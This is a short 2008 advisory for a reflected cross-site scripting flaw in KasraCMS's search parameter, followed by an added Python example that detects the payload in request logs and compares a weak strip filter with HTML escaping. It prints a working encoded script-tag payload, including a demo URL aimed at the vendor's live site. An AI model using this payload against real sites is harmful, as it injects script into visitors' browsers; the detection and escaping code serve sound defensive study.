++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
KasraCMS Cross Site Scripting Vulnerability
Discovered by d3b4g
==============================================
AUTHOR : d3b4g
DATE   : 26 oct 2008
EMAIL  : mocking@hotlism.com
#####################################################
APPLICATION : KasraCMS
[~] WebSite: http://kasracms.com
=======================================================
Attack details
===============
The GET variable search has been set to --%3E%3CScRiPt%20%0A%0D%3Ealert(39841.6878520949)%3B%3C/ScRiPt%3E.

[+] Exploit :
http://SITE.com/?search=--%3E%3CScRiPt%20%0A%0D%3Ealert(39841.6878520949)%3B%3C/ScRiPt%3E

[-] Demo :
http://kasracms.com/?search=--%3E%3CScRiPt%20%0A%0D%3Ealert(39841.6878520949)%3B%3C/ScRiPt%3E
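
Added example, not part of the original advisory and not KasraCMS code: a defender-side check that decodes the search parameter from request lines, flags the mixed-case script tag with embedded line breaks shown above, and compares an exact-match strip filter with HTML output encoding. The function names and the two benign request lines are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets as they would appear in an access log.
# The second one carries the query string quoted in the advisory.
SAMPLE_REQUESTS = [
    "/?search=annual+report",
    "/?search=--%3E%3CScRiPt%20%0A%0D%3Ealert(39841.6878520949)%3B%3C/ScRiPt%3E",
    "/?search=script+writing+tips",
]

# Tag name in any letter case, followed by whitespace, '/' or '>',
# so "<ScRiPt \n\r>" matches while the plain word "script" does not.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script[\s/>]", re.IGNORECASE)


def search_values(target):
    """Return the percent-decoded values of the 'search' parameter."""
    query = urlsplit(target).query
    return parse_qs(query, keep_blank_values=True).get("search", [])


def is_suspicious(target):
    """True if any decoded 'search' value contains a script tag."""
    return any(SCRIPT_TAG.search(v) for v in search_values(target))


def naive_filter(value):
    """Weak approach (hypothetical): strip only the exact lowercase tags."""
    return value.replace("<script>", "").replace("</script>", "")


def render_safe(value):
    """Hardened approach: escape markup characters before echoing the term."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print("FLAG" if is_suspicious(target) else "ok  ", target)
    decoded = search_values(SAMPLE_REQUESTS[1])[0]
    print("naive filter changed input:", naive_filter(decoded) != decoded)
    print("escaped output:", repr(render_safe(decoded)))
```

The exact-match filter returns the decoded value unchanged, while the escaped form contains no raw angle brackets and is rendered by the browser as text.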